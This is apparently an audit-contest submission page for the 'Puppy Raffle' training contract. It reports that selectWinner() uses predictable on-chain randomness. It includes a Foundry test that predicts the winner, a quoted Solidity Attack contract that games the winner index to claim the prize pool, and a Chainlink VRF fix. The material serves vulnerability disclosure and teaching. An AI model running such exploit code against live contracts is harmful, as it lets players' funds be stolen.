Puppy Raffle

AI First Flight #1

Beginner FriendlyFoundrySolidityNFT

EXP

View results

Previous Next

Submission Details

Severity: high

Valid

H-2: Weak on-chain randomness allows winner manipulation

0xjjjjjj

Description

Severity: High

The selectWinner() function at PuppyRaffle.sol:128-129 computes the winner index using predictable on-chain values:

uint256 winnerIndex =

uint256(keccak256(abi.encodePacked(msg.sender, block.timestamp, block.difficulty))) % players.length;

Similarly, rarity is determined at PuppyRaffle.sol:139 using the same pattern:

uint256 rarity = uint256(keccak256(abi.encodePacked(msg.sender, block.difficulty))) % 100;

All three inputs are known or controllable:

msg.sender: the attacker chooses which address calls selectWinner()
block.timestamp: validators can adjust within the acceptable range (~15s)
block.difficulty (now prevrandao post-merge): known to the block proposer before block production

A validator can select the block.timestamp and choose to include the transaction in a block where the hash produces a favorable winnerIndex. Even without validator collusion, any user can simulate the hash off-chain for multiple msg.sender addresses and only submit from the one that wins.

Proof of Concept

function testPredictWinner() public {

address[] memory entrants = new address[](4);

entrants[0] = address(1);

entrants[1] = address(2);

entrants[2] = address(3);

entrants[3] = address(4);

puppyRaffle.enterRaffle{value: entranceFee * 4}(entrants);

vm.warp(block.timestamp + duration + 1);

// Attacker precomputes the winner off-chain using known block values

uint256 predictedIndex = uint256(

keccak256(abi.encodePacked(address(this), block.timestamp, block.difficulty))

) % 4;

address predictedWinner = entrants[predictedIndex];

// Call selectWinner and verify prediction matches

puppyRaffle.selectWinner();

assertEq(puppyRaffle.previousWinner(), predictedWinner);

}

Attacker enters raffle from 10 different addresses
When raffleDuration expires, attacker computes the hash off-chain for each address
Attacker finds the address that produces a winnerIndex pointing to one of their entries
Attacker calls selectWinner() from that address and wins 80% of the prize pool

Risk

Impact: High — attacker steals 80% of the total prize pool and can guarantee a legendary NFT.
Likelihood: High — any validator can trivially exploit this. Non-validators can simulate outcomes off-chain and select the winning msg.sender.

Recommended Mitigation

Replace the on-chain randomness at PuppyRaffle.sol:128-129 and PuppyRaffle.sol:139 with Chainlink VRF:

import {VRFConsumerBaseV2} from "@chainlink/contracts/src/v0.7/VRFConsumerBaseV2.sol";

function selectWinner() external {

require(block.timestamp >= raffleStartTime + raffleDuration, "PuppyRaffle: Raffle not over");

require(players.length >= 4, "PuppyRaffle: Need at least 4 players");

uint256 requestId = COORDINATOR.requestRandomWords(keyHash, subId, confirmations, callbackGasLimit, 2);

}

function fulfillRandomWords(uint256 requestId, uint256[] memory randomWords) internal override {

uint256 winnerIndex = randomWords[0] % players.length;

uint256 rarity = randomWords[1] % 100;

// ... rest of winner selection logic

}

Chainlink VRF provides cryptographically verifiable randomness that cannot be predicted or manipulated by any party.

Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge 4 days ago

Submission Judgement Published

Validated

Assigned finding tags:

[H-03] Randomness can be gamed

## Description The randomness to select a winner can be gamed and an attacker can be chosen as winner without random element. ## Vulnerability Details Because all the variables to get a random winner on the contract are blockchain variables and are known, a malicious actor can use a smart contract to game the system and receive all funds and the NFT. ## Impact Critical ## POC ``` // SPDX-License-Identifier: No-License pragma solidity 0.7.6; interface IPuppyRaffle { function enterRaffle(address[] memory newPlayers) external payable; function getPlayersLength() external view returns (uint256); function selectWinner() external; } contract Attack { IPuppyRaffle raffle; constructor(address puppy) { raffle = IPuppyRaffle(puppy); } function attackRandomness() public { uint256 playersLength = raffle.getPlayersLength(); uint256 winnerIndex; uint256 toAdd = playersLength; while (true) { winnerIndex = uint256( keccak256( abi.encodePacked( address(this), block.timestamp, block.difficulty ) ) ) % toAdd; if (winnerIndex == playersLength) break; ++toAdd; } uint256 toLoop = toAdd - playersLength; address[] memory playersToAdd = new address[](toLoop); playersToAdd[0] = address(this); for (uint256 i = 1; i < toLoop; ++i) { playersToAdd[i] = address(i + 100); } uint256 valueToSend = 1e18 * toLoop; raffle.enterRaffle{value: valueToSend}(playersToAdd); raffle.selectWinner(); } receive() external payable {} function onERC721Received( address operator, address from, uint256 tokenId, bytes calldata data ) public returns (bytes4) { return this.onERC721Received.selector; } } ``` ## Recommendations Use Chainlink's VRF to generate a random number to select the winner. Patrick will be proud.

Rewards breakdown

This contest has a flat reward structure with the following payouts:

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being reviewed by our AI judge. Results will be available in a few minutes.

View all submissions

Rewards Distribution

The contest is complete and the rewards are being distributed.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!